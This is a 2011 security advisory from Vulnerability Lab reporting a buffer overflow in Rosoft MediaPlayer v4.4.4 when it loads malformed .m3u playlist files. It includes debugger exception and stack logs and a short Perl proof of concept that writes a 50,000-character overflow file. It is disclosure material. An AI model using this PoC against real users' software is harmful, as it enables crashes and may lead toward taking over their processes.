Rosoft MediaPlayer v4.4.4 - Buffer Overflow Vulnerability

2011-06-21T00:00:00
ID VULNERLAB:94
Type vulnerlab
Reporter Vulnerability Research Laboratory - X4lt
Modified 2011-06-21T00:00:00

Description

                                        
                                            Document Title:
===============
Rosoft MediaPlayer v4.4.4 -  Buffer Overflow Vulnerability



Release Date:
=============
2011-06-21


Vulnerability Laboratory ID (VL-ID):
====================================
94


Product & Service Introduction:
===============================
Ever since we released our very first multimedia program 1999 we have kept on improving the programs to fit our users need. 
Over the years we have come up with four programs that do pretty much what you need when it comes to the ordinary audio demands. 
We have four programs, Rosoft Audio Converter, Rosoft Audio Recorder, Rosoft CD Extractor and Rosoft Media Player. 
Our programs targets none advanced users although an advanced user may well find our tools useful. 
Our goal has been to create tools that are easy to use. 
Below you have a list of some of all the download sites where you can find our programs.  

(Copy of the Vendor Homepage: http://www.rosoftengineering.com/Default.aspx)


Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered a Buffer overflow Vulnerability on Rosofts MediaPlayer Free - Silver Edition.


Vulnerability Disclosure Timeline:
==================================
2011-06-21:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A Buffer Overflow vulnerability is detected on   Rosofts MediaPlayer v4.4.4
Due a lack of the input validation check while loading the file a buffer overflow can crash the program.
The bug can very likely be used to overflow the program and take control over the system privileged user account process of the service.

--- Exception Logs ---
(3f8.310): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001a27d2 ebx=00000041 ecx=0012fff5 edx=0000ad30 esi=7ffb0222 edi=00000010
eip=7c91302c esp=0012e4f8 ebp=0012e504 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlUnicodeToMultiByteN+0x91:
7c91302c 88590b          mov     byte ptr [ecx+0Bh],bl      ds:0023:00130000=41



--- Stacktext Logs ---
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e504 77d202a5 0012e9cc 000186b0 0012e544 ntdll!RtlUnicodeToMultiByteN+0x91
0012e52c 77d46c30 00000000 0019fb80 0000c358 USER32!WCSToMBEx+0x7e
0012e554 77d2f7c0 00160970 00000000 00000001 USER32!GetClipboardFormatNameA+0x68eb
0012e5e0 77d36175 00720298 00000189 00000000 USER32!WINNLSGetIMEHotkey+0x2681
0012e600 77d18709 000502b6 00000189 00000000 USER32!SetDlgItemTextA+0xa0
0012e62c 77d187eb 77d36129 000502b6 00000189 USER32!GetDC+0x72
0012e694 77d1c00e 00000000 77d36129 000502b6 USER32!GetDC+0x154
0012e6c4 77d1e366 77d36129 000502b6 00000189 USER32!DestroyCaret+0x5e
0012e6e4 0043dc93 77d36129 000502b6 00000189 USER32!CallWindowProcA+0x1b
0012e850 0042818b 0012e910 00a00f53 00aad1ec image00400000+0x3dc93
0012e890 0042b5e2 00000189 00000000 0012e9cc image00400000+0x2818b
0012e8a8 77d18709 000502b6 00000189 00000000 image00400000+0x2b5e2
0012e8d4 77d187eb 00a00f53 000502b6 00000189 USER32!GetDC+0x72
0012e93c 77d1b743 00000000 00a00f53 000502b6 USER32!GetDC+0x154
0012e978 77d1e2f7 00720298 00720230 00000000 USER32!GetParent+0x16c
0012e998 00427498 000502b6 00000189 00000000 USER32!SendMessageA+0x49
0012f9d0 41414141 41414141 41414141 41414141 image00400000+0x27498
0012f9d4 41414141 41414141 41414141 41414141 0x41414141
0012f9d8 41414141 41414141 41414141 41414141 0x41414141
0012f9dc 41414141 41414141 41414141 41414141 0x41414141
0012f9e0 41414141 41414141 41414141 41414141 0x41414141
0012f9e4 41414141 41414141 41414141 41414141 0x41414141
0012f9e8 41414141 41414141 41414141 41414141 0x41414141
0012f9ec 41414141 41414141 41414141 41414141 0x41414141
0012f9f0 41414141 41414141 41414141 41414141 0x41414141
0012f9f4 41414141 41414141 41414141 41414141 0x41414141
0012f9f8 41414141 41414141 41414141 41414141 0x41414141
0012f9fc 41414141 41414141 41414141 41414141 0x41414141
0012fa00 41414141 41414141 41414141 41414141 0x41414141
0012fa04 41414141 41414141 41414141 41414141 0x41414141
0012fa08 41414141 41414141 41414141 41414141 0x41414141
0012fa0c 41414141 41414141 41414141 41414141 0x41414141
0012fa10 41414141 41414141 41414141 41414141 0x41414141
0012fa14 41414141 41414141 41414141 41414141 0x41414141
0012fa18 41414141 41414141 41414141 41414141 0x41414141
0012fa1c 41414141 41414141 41414141 41414141 0x41414141
0012fa20 41414141 41414141 41414141 41414141 0x41414141
0012fa24 41414141 41414141 41414141 41414141 0x41414141
0012fa28 41414141 41414141 41414141 41414141 0x41414141
0012fa2c 41414141 41414141 41414141 41414141 0x41414141
...


Pictures:
                                                     ../1.png


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers via stream or by local attackers to escalate out of the software process.
For demonstration or reproduce ...


my $sploitfile="vlab.m3u";
print " [+] Preparing payload\n";
my $header = "http://";
my $junk = "A" x 50000;
my $payload = $header.$junk;
print " [+] Writing payload to file\n";
open(sploitf,">$sploitfile");
print sploitf $payload;
close(sploitf);
print " [+] PoC file " . sploitfile . " created\n";
print " [+] Wrote " . length($payload) . " bytes\n";


Security Risk:
==============
The security risk of the buffer overflow vulnerability via m3u files is estimated as high.


Credits & Authors:
==================
Vulnerability Research Laboratory - X4lt


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory